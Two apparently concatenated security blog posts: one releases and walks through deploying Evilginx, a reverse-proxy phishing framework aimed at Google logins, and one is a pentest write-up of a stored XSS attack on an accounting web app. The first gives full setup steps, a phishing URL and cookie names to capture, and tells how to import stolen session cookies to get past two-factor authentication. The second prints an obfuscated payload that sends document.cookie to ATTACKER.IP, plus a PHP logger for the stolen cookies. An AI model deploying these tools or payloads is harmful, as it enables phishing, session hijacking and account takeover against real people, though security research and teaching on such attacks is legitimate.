I'm releasing my latest Evilginx project, which is a man-in-the-middle attack framework for remotely capturing credentials and session cookies of any web service. It uses Nginx HTTP server to proxy legitimate login page, to visitors, and captures credentials and session cookies on-the-fly. It works remotely, uses custom domain and a valid SSL certificate. I have decided to phish Google services for Evilginx demonstration as there is no better way to assess this tool's effectiveness than stress-testing best anti-phishing protections available.

Please note that Evilginx can be adapted to work with any website, not only with Google.

Enjoy the video. If you want to learn more on how this attack works and how you can implement it yourself, do read on.

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

How it works
  1. Attacker generates a phishing link pointing to his server running Evilginx: https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID
    Parameters in the URL stand for:
    rc =
    On successful sign-in, victim will be redirected to this link e.g. document hosted on Google Drive.
    rt = This is the name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, this will be an indication for Evilginx that sign-in was successful and the victim can be redirected to URL supplied by rc parameter.
  2. Victim receives attacker's phishing link via any available communication channel (email, messenger etc.).
  3. Victim clicks the link and is presented with Evilginx's proxied Google sign-in page.
  4. Victim enters his/her valid account credentials, progresses through two-factor authentication challenge (if enabled) and he/she is redirected to URL specified by rc parameter. At this point rd cookie is saved for notreallygoogle.com domain in victim's browser. From now on, if this cookie is present, he/she will be immediately redirected to rc URL, when phishing link is re-opened.
  5. Attacker now has victim's email and password, as well as session cookies that can be imported into attacker's browser in order to take full control of the logged in session, bypassing any two-factor authentication protections enabled on victim's account.

Let's take few steps back and try to define main obstacles in traditional phishing efforts.

First and major pain with phishing for credentials is two-factor authentication. You can create the best looking template that yields you dozens of logins and passwords, but you will eventually get roadblocked when asked for verification token that arrived via SMS. Not only will it stop you from progressing further, but it will also tip off the account owner, when they receive login attempt alert.

Second issue with phishing templates is, they must allow to accept any login and password, as they have no means of confirming their validity. That will, at times, leave you with invalid credentials.

Third issue is having to create phishing templates. I don't know about you, but for me the process of copying site layout, stripping javascript, fixing CSS and writing my own replacements for stripped javascript code to make the login screen behave as the original, is extremely annoying. It feels bad to recreate something, which has already been done.

In past several months I have worked on my own ettercap-like HTTP proxy software written in C++, using Boost::Asio library for maximum efficiency. I implemented SSLstrip, DNS spoofing and HSTS bypass. This solution worked perfectly in Local Area Network, but I wondered if same ideas could be repurposed for remote phishing, without a need to use custom-made software.

I had a revelation when I read an excellent blog post by @i_bo0om. He used Nginx HTTP server's proxy_pass feature and sub_filter module to proxy the real Telegram login page to visitors, intercepting credentials and session cookies on-the-fly using man-in-the-middle attacks. This article made me realize that Nginx could be used as a proxy for external servers and it sparked the idea of Evilginx. The idea was perfect - simple and yet effective.

Allow me to talk a bit on Evilginx's research process, before I focus on installation and usage.

Evilginx Research

The core of Evilginx is the usage of Nginx HTTP proxy module. It allows to pass clients' requests to another server. This basically allows Nginx server to act as a man-in-the-middle agent, effectively intercepting all requests from clients, modifying and forwarding them to another server. Later, it intercepts server's responses, modifies them and forwads them back to clients. This setup allows Evilginx to capture credentials sent with POST request packets and upon successful sign-in, capture valid session cookies sent back from the proxied server.

In order to prevent the visitor from being redirected to the real website, all URLs with real website's domain, retrieved from the server, need to replaced with Evilginx phishing domain. This is handled by sub_filter module provided by Nginx.

Nginx implements its own logging mechanism, which will log every request in detail, including POST body and also cookies: and set-cookie: headers. I created a Python script named evilginx_parser.py, that will parse the Nginx log and extract credentials and session cookies, then save them in corresponding directories, for easy management.

There is one big issue in Nginx's logging mechanism that almost prevented Evilginx from being finished.

Take a look at the following Nginx configuration line that specifies the format in which log entries should be created:

log_format foo '$remote_addr "$request" set_cookie=$sent_http_set_cookie';

Variable $sent_http_set_cookie stores a value of set-cookie response header. These headers will contain session cookies returned from the server on successful authorization and they have to be included in the output of Nginx's access log.
Issue is, HTTP servers return cookies in multiple set-cookie headers like so:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly
Set-Cookie: APPID=this_is_the_second_cookie; path=/;
Set-Cookie: NSAL33TTRACKER=this_is_the_third_cookie; path=/;
Server: nginx
Connection: close

For some reason Nginx's $sent_http_set_cookie variable doesn't store set-cookie header values as an array. Instead it stores only the value of the first seen set-cookie header, which in our example would be JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly. This is a huge problem, as it allows to log only one cookie and forget the rest. While searching the internet for possible solutions, I came across posts from 2011 about the same issue, reported by hopeless sysadmins and developers. I was positive that Nginx itself did not have any workaround.

I had two options:

  1. Modifying Nginx source code and fixing the issue myself.
  2. Developing a custom Nginx module that would allow for better packet parsing.

After a while, I knew neither of the two options were viable. They would have required me to spend huge amount of time, understanding the internals of Nginx. Neither did I want to do it or did I have that amount of time to spend on a side project.

Thankfully, I came across some interesting posts about using LUA scripting language in Nginx configuration files. I learned it was OpenResty Nginx modification, which allowed to put small scripts into site configuration files to handle packet parsing and data output.

OpenResty website describes itself as such:

OpenResty® is a full-fledged web platform that integrates the standard Nginx core, LuaJIT, many carefully written Lua libraries, lots of high quality 3rd-party Nginx modules, and most of their external dependencies. It is designed to help developers easily build scalable web applications, web services, and dynamic web gateways.

I found out that by using LUA scripting, it was possible to access set-cookie headers as an array.

Here is an example function that returns all set-cookie header values as an array:

function get_cookies()
	local cookies = ngx.header.set_cookie or {}
	if type(cookies) == "string" then
		cookies = {cookies}
	end
	return cookies
end

The big issue with logging cookies was resolved and the best part of it was, LUA scripting allowed much more in terms of packet modification, which wasn't allowed by vanilla Nginx, e.g. modification of response packet headers.

The rest of development followed swiftly. I will explain more interesting aspects of the tool as I go, while I guide you on how to install and set up everything from scratch.

Getting Your Hands Dirty

[UPDATE 2014-04-26] I've released a new version of Evilginx, which makes the installation process described in this post slightly out-of-date. For new installation instructions, refer to the latest post about Evilginx 1.0 Update.

First of all, we need a server to host Evilginx. I've used a Debian 8.7 x64 512MB RAM VPS hosted on Digital Ocean. If you use this link and create an account, you will get free $10 to spend on your servers. I've used the cheapest $5/mo server, so it should give you 2 months extra and seriously Digital Ocean is the best hosting company I've ever used.

Once our server is up and running, we need to log into it and perform upgrades, just in case:

apt-get update
apt-get upgrade

We will also need a domain that will point to our VPS. I highly recommend buying one from NameCheap (yes, this is my affiliate link, thanks!). They have never let me down and support is top notch.

I won't cover here how to set up your newly bought domain to point at your newly bought VPS. You can find excellent tutorials on Digital Ocean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean

For the remainder of this post, let's assume that our registered domain is: notreallygoogle.com .

Installing OpenResty/Nginx

Now we can proceed to install OpenResty. We will be installing it from source. At the time of writing, most current version was 1.11.2.2, so if you want a newer version, you can check the download page for more up-to-date links.

mkdir dev
cd dev
wget https://openresty.org/download/openresty-1.11.2.2.tar.gz
tar zxvf openresty-1.11.2.2.tar.gz
cd openresty-1.11.2.2

With OpenResty unpacked, we need to install our compiler and dependency packages to compile it. The following will install Make, GCC compiler, PCRE and OpenSSL development libraries:

apt-get -y install make gcc libpcre3-dev libssl-dev

Before we compile the sources, we need to configure the installation. The following line will do the job of putting the Nginx binaries, logs and config files into proper directories. It will also enable sub_filter module and LuaJIT functionality.

./configure --user=www-data --group=www-data --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --with-http_ssl_module --with-pcre --with-http_sub_module --with-luajit

At this point, we are ready to compile and install.

make
make install

If all went well, we can verify that OpenResty was installed properly:

[email protected]:~# nginx -v
nginx version: openresty/1.11.2.2

From now on, I will refer to OpenResty as Nginx. I believe it will make it less confusing.

Setting up the daemon

Nginx is now installed, but it currently won't start at boot or keep running in the background. We need to create our own systemd daemon service rules:

cat <<EOF > /etc/systemd/system/nginx.service
[Unit]
Description=The NGINX HTTP and reverse proxy server
After=syslog.target network.target remote-fs.target nss-lookup.target

[Service]
Type=forking
PIDFile=/run/nginx.pid
ExecStartPre=/usr/sbin/nginx -t
ExecStart=/usr/sbin/nginx
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target
EOF

Before we launch our service for the first time, we have to properly configure Nginx.

Nginx configuration

We need to open Nginx configuration file /etc/nginx/nginx.conf with any text editor and make sure to add include /etc/nginx/sites-enabled/*; in the http {...} block. After modification, it should look something like this:

...
http {
    include       mime.types;
    default_type  application/octet-stream;

    include /etc/nginx/sites-enabled/*;
    ...
}

Nginx, from now on, will look for our site configurations in /etc/nginx/sites-enabled/ directory, where we will be putting symbolic links of files residing in /etc/nginx/sites-available/ directory. Let's create both directories:

mkdir /etc/nginx/sites-available/ /etc/nginx/sites-enabled/

We need to set up our phishing site configuration for Nginx. We will use the site configuration for phishing Google users, that is included with Evilginx package. Easiest way to be up-to-date is to clone Evilginx GitHub repository.

apt-get -y install git
cd ~
mkdir tools
cd tools
git clone https://github.com/kgretzky/evilginx
cd evilginx

Now copy Evilginx's site configuration template to /etc/nginx/sites-available/ directory. We will also replace all occurences of {{PHISH_DOMAIN}} in the template file with the name of the domain we registered, which in our case is notreallygoogle.com. When it's done, create a symbolic link to our new site configuration file in /etc/nginx/sites-enabled/ directory:

cp ./sites/evilginx-google-template.conf /etc/nginx/sites-available/evilginx-google.conf
sed -i 's/{{PHISH_DOMAIN}}/notreallygoogle.com/g' /etc/nginx/sites-available/evilginx-google.conf
ln -s /etc/nginx/sites-available/evilginx-google.conf /etc/nginx/sites-enabled/

We are almost ready. One remaining step is to install our SSL/TLS certificate to make Evilginx phishing site look legitimate and secure. We will use LetsEncrypt free SSL/TLS certificate for this purpose.

Installing SSL/TLS certificates

EFF has released an incredibly easy to use tool for obtaining valid SSL/TLS certificates from LetsEncrypt. It's called Certbot and we will use it right now.

Open your /etc/apt/sources.list file and add the following line:

deb http://ftp.debian.org/debian jessie-backports main

Now install Certbot:

apt-get update
apt-get install certbot -t jessie-backports

If all went well, we should be able to obtain our certificates now. Make sure Nginx is not running, as Certbot will need to open HTTP ports for LetsEncrypt to verify ownership of our server. Enter the following command and proceed through prompts:

certbot certonly --standalone -d notreallygoogle.com -d accounts.notreallygoogle.com

On success, our private key and public certificate chain should find its place in /etc/letsencrypt/live/notreallygoogle.com/ directory. Evilginx's site configuration already includes a setting to use SSL/TLS certificates from this directory.

Please note, that LetsEncrypt certificates are valid for 90 days, so if you plan to use your server for more than 3 months, you can add certbot renew command to your /etc/crontab and have it run every day. This will make sure your SSL/TLS certificate is renewed when its bound to expire in 30 days or less.

Starting up

Everything is ready for launch. Make sure your Nginx daemon is enabled and start it:

systemctl enable nginx
systemctl start nginx

Check if Nginx started properly with systemctl status nginx and make sure that both ports 80 and 443 are now opened by the Nginx process, by checking output of netstat -tunalp.

If anything went wrong, try to retrace your steps and see if you did everything properly. Do not hesitate to report issues in the comments section below or even better, file an issue on GitHub.

In order to create your phishing URL, you need to supply two parameters:

  1. rc = On successful sign-in, victim will be redirected to this link e.g. document hosted on Google Drive.
  2. rt = This is the name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, this will be an indication for Evilginx that sign-in was successful and the victim can be redirected to URL supplied by rc parameter.

Let's say we want to redirect the phished victim to rick'roll video on Youtube and we know for sure that Google's session cookie name is LSID. The URL should look like this:

https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID

Try it out and see if it works for your own account.

Capturing credentials and session cookies

Nginx's site configuration is set up to output data into /var/log/evilginx-google.log file. This file will store all relevant parts of requests and responses that pass through Nginx's proxy. Log contents are hard to analyze, but we can automate its parsing.

I wrote a small Python script, called evilginx_parser.py, which will parse Nginx's log files and extract only credentials and session cookies from them. Those will be saved in separate files in directories named after extracted accounts' usernames.

I assume, you've now tested your Evilginx setup with phishing for your own account's session. Let's try to extract your captured data. Here is the script's usage page:

# ./evilginx_parser.py -h
usage: evilginx_parser.py [-h] -i INPUT -o OUTDIR -c CREDS [-x]

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input log file to parse.
  -o OUTDIR, --outdir OUTDIR
                        Directory where output files will be saved.
  -c CREDS, --creds CREDS
                        Credentials configuration file.
  -x, --truncate        Truncate log file after parsing.

All arguments should be self-explainatory apart maybe from --creds and --truncate. Argument --creds specifies the input config file, which provides info for the script, what kind of data we want to extract from the log file.

Creds config file google.creds, made for Google, looks like this:

[creds]
email_arg=Email
passwd_arg=Passwd
tokens=[{"domain":".google.com","cookies":["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]},{"domain":"accounts.google.com","cookies":["GAPS", "LSID"]}]

Creds file provides information on sign-in form username and password parameter names. It also specifies a list of cookie names that manage user's session, with assigned domain names. These will be intercepted and captured.

It is very easy to create your own .creds config files if you decide to implement phishing of other services for Evilginx.

If you supply the -x/--truncate argument, the script will truncate the log file after parsing it. This is useful if you want to automate the execution of the parser to run every minute, using cron.

Example usage of the script:

# ./evilginx_parser.py -i /var/log/evilginx-google.log -o ./logs -c google.creds -x

That should put extracted credentials and cookies into ./logs directory. Accounts are organized into separate directories, in which you will find files containing login attempts and session cookies.

Session cookies are saved in JSON format, which is fully compatible with EditThisCookie extension for Chrome. Just pick Import option in extension's window and copy-paste the JSON data into it, to impersonate the captured session.

Keep in mind that it is often best to clear all cookies from your browser before importing.

After you've imported the intercepted session cookies, open Gmail for example and you should be on the inside of the captured account.

Congratulations!

Session Hijacking FAQ

I figured, many of you may not be familiar with the method of hijacking session tokens. I'd like to shed some light on the subject by answering some questions that I often get.

Does session hijacking allow to take full control of the account, without the need to even know the user's account password?

Yes. When you import other account's session cookies into your browser, the server has no other option than to trust that you are indeed the person who logged into his own account.

How is this possible? Shouldn't there be protections to prevent this?

The only variable, which is hard to control for the attacker is the source IP address. Most web services, handling critical data, should not allow the same session token to be used from multiple IP addresses at the same time (e.g. banks). It would be wise to detect such scenario and then invalidate the session token, requiring both parties to log in again. As far as I've tested, Google doesn't care about the IP address of the account that uses a valid session token. Attacker's IP can be from different continent and still it wouldn't raise red flags for the legitimate account owner.

I believe the only reason why Google does allow to simultaneously access accounts from different IPs, using same session token, is user experience. Imagine how many users switch their IPs, while they have constant access to their Google services. They have Google signed in on their phone and PC, they move between coffee shop, work and home, where they use different wireless networks, VPNs or 3G/4G networks.

If Google was to invalidate session tokens every time IP change was detected, it would make using their services a nightmare and people would switch to easier to use alternatives.

And, no, Google Chrome does not perform any OS fingerprinting to verify legitimate owner's machine. It would be useless as it would provide less protection for people using other browsers (Firefox, Safari, Opera) and even if they did fingerprint the OS, the telemetry information would have to be somehow sent to the server, during user's sign-in. This inevitably would also allow hijacking.

Does the account owner get any alerts when he tries to log into Google through Evilginx phishing site?

Yes. On successful login, the account owner will receive a push notification to his Android phone (registered with the same Google account) and an e-mail to his address, with information that someone logged into their account from unknown IP address. The IP address will be the one of Evilginx server, as it is the one acting as a man-in-the-middle proxy and all requests to Google server originate from it.

The attacker can easily delete the "Unknown sign-in alert" e-mail after getting access to the account, but there will be no way for him to remove the push notification, sent to owner's Android phone.

Issue is, some people may ignore the alert, which will be sent exactly after they personally sign into Evilginx phishing site. They may understand the alert is a false positive, as they did sign in a minute earlier.

How would this attack fare against hardware two-factor authentication solutions?

Edit (2017/04/07):
Apparently U2F "security key" solutions check the domain you're logging into when the two-factor token is generated. In such scenario the attack won't work as the user won't be able to log in, because of the phishing domain being present instead of the legitimate one.

Thanks to kind readers who reported this!

Two-factor authentication protects the user only during the sign-in process. If user's password is stolen, 2FA acts as a backup security protection, using an additional communication channel that is less likely for an attacker to compromise (personal phone, backup e-mail account, hardware PIN generators).

On successful login, using any form of two-factor authentication, the server has to save session cookies in account's owner browser. These will be required, by the server, to verify the account owner of every sent, subsequent request.

At this point, if the attacker is in possession of session cookies, 2FA authentication methods do not matter as the account has already been compromised, since the user successfully logged in.

What will happen if I don't tick "Remember me" checkbox at Evilginx phishing page, which should make the session token temporary?

Temporary session token will be sent to user's browser as a cookie with no expiration date. This lets the browser know to remove this cookie from cache when the browser is closed. Evilginx will still capture the temporary session token and during extraction it will add its own +2 years expiration date, making it permanent this time.

If the server doesn't have any mechanism to invalidate temporary session tokens after a period of time. Tokens, they issued, may be used by an attacker for a long time, even after the account owner closes their browser.

What can I do if I my session token gets stolen? How do I prevent the attacker from accessing my account?

At this point, the best thing you can do is change your password. Mature services like Google will effectively invalidate all active session tokens, in use with your account. Additionally your password will change and the attacker won't be able to use it to log back in.

Google also provides a feature to see the list of all your active sessions, where you can invalidate them as well.

How do I not get phished like this?

Do NOT only check if the website, you are logging in to, has HTTPS with secure lock icon in the address bar. That only means that the data between you and the server is encrypted, but it won't matter if benevolent attacker secures data transport between you and his server.

Most important is to check the domain in the address bar. If the address of the sign-in page looks like this: https://accounts.mirrorgoogle.com/ServiceLogin?blahblah, put the domain name mirrorgoogle.com directly in Google search. If nothing legitimate comes up, you may be sure that you are being phished.

Conclusion

I need to stress out that Evilginx is not exploiting any vulnerability. Google still does a terrific job at protecting its users from this kind of threat. Because Evilginx acts as a proxy between the user and Google servers, Google will recognize proxy server's IP as a client and not the user's real IP address. As a result, user will still receive an alert that his account was accessed from an unknown IP (especially if the Evilginx server is hosted in a different country than phished user resides in).

I released this tool as a demonstration of how far attackers can go in hunt for your accounts and private data. If one was to fall for such ploy, not even two-factor authentication would help.

If you are a penetration tester, feel free to use this tool in testing security and threat awareness of your clients.

In the future, if the feedback is good, I plan to write a post going into details on how to create your own Evilginx configuration files in order to add support for phishing any website you want.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

I am extremely passionate about what I do and I like to work with people smarter than I am.

As always, if you have any suggestions, ideas or you just want to say "Hi", hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

You can find Evilginx project on GitHub here:
Evilginx on GitHub

Till next time!

Sniping Insecure Cookies with XSS

Sniping Insecure Cookies with XSS

In this post I want to talk about improper implementation of session tokens and how one XSS vulnerability can result in full compromise of a web application. The following analysis is based on an existing real-life web application. I cover the step-by-step process that lead to administrator's account take over and I share my thoughts on what could have been done to better secure the application.

Recently, I've performed a penetration test of a web application developed by an accounting company that handles my accounting. I figured that my own financial data is as secure as the application itself, so I decided to poke around and see what flaws I was able to find.

The accounting application, that I will be talking about, allows to check unpaid invoices, see urgent messages from accounting staff and keeps the user up to date on how much needs to be paid to various financial institutions.

One of the first things I do, when starting a new web penetration test, is finding out how session tokens are generated and handled. This often gives me quick insight into what I may be up against.

Meet the Token

As I found out, the application relies heavily on providing functionality via REST API and site content is generated dynamically using AngularJS with asynchronous requests.

I started by signing into my account. The sign-in packet sent to the REST backend looked as follows:

POST /tokens HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 64
Accept: application/json, text/plain, */*
Origin: https://app.accounting.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8

{"email":"[email protected]","password":"super_secret_passwd"}

The response to my sign-in attempt with valid credentials looked like this:

HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Wed, 15 Mar 2017 11:23:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 356
Connection: close
Vary: Accept-Encoding
Request-Time: 121
Access-Control-Allow-Origin: *

{"value":"eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg","account":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"expirationDate":"2017-03-16T11:23:23+0000"}

The server replied with what looked like a session token and information about my account. The whole JSON reply, as I found out, was later saved into globals cookie, presumably to be accessible by the AngularJS client-side scripts. I learned that globals cookie was saved without secure or http-only flags set.

Without http-only flag, the cookie is accessible from javascript running under same domain, which I assumed was intended behaviour, as the client-side scripts could retrieve its data to populate website contents and use the session token with AJAX requests to REST backend. For cookies, without http-only flag set, it often ends badly once a single XSS vulnerability is discovered.

The lack of secure flag in the cookie, allows for its theft via man-in-the-middle attack. The attacker can just inject <img src="http://app.accounting.com/"> into browsed HTTP traffic and intercept the HTTP request including the session token cookie, which will be sent over unencrypted HTTP channel. It also doesn't help that the application doesn't have HTTP Strict Transport Policy enabled in response headers.

Lets focus on the session token itself, which reads:

eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg

During the web application penetration test I often sign-out and sign-in multiple times to see if the newly generated session token, provided by the server, differs much from the previous one. In this situation, it was apparent the token was in the JSON Web Token format.

In short, JSON Web Token aka JWT is a combination of user data and a hash signature. The hash prevents anyone who doesn't know the secret key, used in the hashing process, from crafting their own tokens. The token is divided into three sections and each is encoded with base64.

Dissecting this application's token we get:

JWT format: <encryption_algo_info>.<user_data>.<signature>
JWT: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg  

atob('eyJhbGciOiJIUzI1NiJ9') => '{"alg":"HS256"}'
atob('eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30') => '{"tokenType":"AUTHORIZE","exp":1489663403,"id":77}'
atob('5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg') => <signature_hash_binary_data_HMAC_SHA256_user_data>

The server will re-calculate the signature hash of user_data with the secret key only known to the server. If the re-calculated hash differs from the one supplied with the token, it will not be accepted.

We can see that the token contains timestamp information of when it is supposed to expire (in this scenario tokens were valid for one day) and the ID of the user, who should be authorized. It is evident that if we were able to change the id value inside the token, it would allow us to be authorized as any registered user of the application. Issue is, we would have to re-calculate the signature hash using the secret key we don't know.

It is possible to brute-force the secret key using an offline dictionary attack and a powerful PC, but if the secret key is longer than 12 characters and uses also special characters, this will be a waste of time and more importantly a waste of CPU or GPU cycles.

There have already been many articles written on why using JWT is bad, so I'll try to keep my list short and stick to two major flaws:

  1. Possibility to crack the secret key. If the attacker has resources, time and enough motivation the secret key can be cracked.
  2. No way to invalidate the tokens. Every application that allows users to manage their accounts should invalidate and re-create the session token every time the user signs in, signs out or resets his/her password. This makes sure that any attacker who managed to intercept the user's session token will not be able to use it anymore. Attacker will immediately lose access to overtaken account. This cannot be done with JWT as the server will disallow the session token only after "exp":1489663403 timestamp is hit on the server.

Let's leave the fact that the application is using JWT as a session token and focus on the implications of allowing the session token to be accessible from javascript.

The sample request to REST backend, that includes the session token, looks as follows:

GET /messages/page/1?cacheTime=1489429271483&messagePageType=LATEST&pageSize=10&read=false HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

As we can see, the session token is sent in a custom HTTP header X-AUTH-TOKEN. Sending session tokens in custom HTTP headers, protect applications from Cross-site Request Forgery (CSRF) attacks. Unfortunately, the fact that globals cookie, storing the token, must be available from javascript, in order to be included with a request, makes the application exceptionally vulnerable to token theft. All the attacker needs is one XSS vulnerability in the application, in order to capture the token cookie with injected javascript code.

With that in mind, I proceeded to look for vulnerabilities that would allow me to inject javascript code.

One XSS to Rule Them All

I found a messaging feature, in the application, that immediately caught my attention. Basically, it allowed all users to send any message to application's administrators and initiate a conversation. If vulnerable, it would make the perfect channel to send stored XSS straight to site admininstrators.

I put a blank message with one carriage return character, clicked Send and looked at the request:

PUT /messages HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 1242
Accept: application/json, text/plain, */*
X-AUTH-TOKEN: eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Origin: https://app.accounting.com
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

{"id":3596,"content":"<div><br></div>","creationDate":"2017-03-13T19:42:36+0000","sender":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"recipient":{"id":1,"email":"[email protected]","status":"ACTIVE","role":"OFFICE_ADMIN","firstName":"Admin","lastName":"Office","client":null,"creationDate":"2015-12-21T09:09:05+0000"},"modificationDate":null,"read":false,"attribute":null,"date":"13.03.2017 20:42"}

When I saw "content":"<div><br></div>" in the JSON request body, I knew I was right at home. The application swallowed and spit out the contents of the message back without any filtering at all. All supplied HTML tags were preserved.

I confirmed presence of XSS vulnerability by sending "content":"<script>alert(1)</script>" as a replacement for my message content, using the Edit feature and intercepting the request in Burp Proxy. After reloading, the page greeted me valiantly with javascript alert box.

Seeing that the request contained recipient information as well, it would be wise to test for ability to send messages to other users of the application, by tampering with the recipient data. This would let the attacker launch phishing attacks against other users. At this point I didn't bother as I had everything to set up an attack that would hopefully grant me administrator privileges.

The Attack

In order to intercept administrator's cookies, I decided to make my script create a new Image and append it to document's body. User's cookies would be sent to attacker's controlled server via GET parameters, embedded in the URL to fake image on attacker's web server.

Injected HTML code would look like this:

<img src="http://ATTACKER.IP/image.php?c=<stolen_cookies>" />

The moment, the browser will render this image, all of the visitor's cookies (for current domain) will be sent to attacker's server.

In order to dynamically inject the image into document's body, I required a javascript oneliner that will act as XSS payload. Here it was:

var img = new Image(0,0); img.src='http://ATTACKER.IP/image.php?c=' + document.cookie; document.body.appendChild(img);

To make it less obvious and to obfuscate our payload a bit, I converted it to use base64 encoding:

eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));

My payload was ready, but I also needed a server backend at http://ATTACKER.IP/image.php that would wait for stolen cookies and log them for later retrieval. Here is a simple script in PHP that I used to do the job. Just remember to create the secretcookielog9977.txt file in advance and give it R/W permissions:

<?php

if (isset($_GET['c'])) $cookie = $_GET['c']; else exit;

$log = 'secretcookielog9977.txt';

$d = date('Y-m-d H:i:s');
$ua = $_SERVER['HTTP_USER_AGENT'];
$ip_addr = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];

$f = fopen($log, 'a+');
fputs($f, "Date: $d | IP: $ip_addr | UA: $ua | Referer: $referer\r\nCookies: $cookie\r\n\r\n");
fclose($f);

?>

With all that prepared, I returned to the application and edited my message for the last time. I have intercepted the edit HTTP request and replaced the content data with:

"content":"<script>eval(atob('dmFyIGltZyA9IG5ldyBJbWFnZSgwLDApOyBpbWcuc3JjPSdodHRwOi8vQVRUQUNLRVIuSVAvaW1hZ2UucGhwP2M9JyArIGRvY3VtZW50LmNvb2tpZTsgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpbWcpOw'));</script>"

I reloaded the page and checked the secretcookielog9977.txt on my web server to confirm that I've managed to steal my own cookies. All worked perfectly.

Now, all I had to do is wait for the site administrator to sign in and read my malicious message. Shortly after...

** JACKPOT **

I had administrator's session token that was valid for 1 full day. Due to the token being JSON Web Token, there was no way for the administrator to invalidate it, even if it was found to be compromised.

With the administrator's token captured, the real attacker could have done significant damage. For me it was enough to demonstrate the risk and report my findings.

Game over

As demonstrated, the application had an evident stored XSS vulnerability that allowed the attacker to steal administrator user's cookies, including the session token. The XSS would have much less impact if the cookie was stored with http-only flag, thus making it inaccessible from javascript. Session token was made to be sent in every request to REST API in a custom X-AUTH-TOKEN header, so making it accessible from javascript was mandatory.

Here are my two cents on how the security of the pentested application could be improved:

1. Never allow cookies containing session tokens to be accessible from javascript.

In my opinion, cookies that include the session token or other critical data, should never be set without the http-only flag. Session token should be stored in a separate cookie flagged with http-only and REST API backend should reply with following HTTP headers:

Access-Control-Allow-Origin: https://app.accounting.com
Access-Control-Allow-Credentials: true

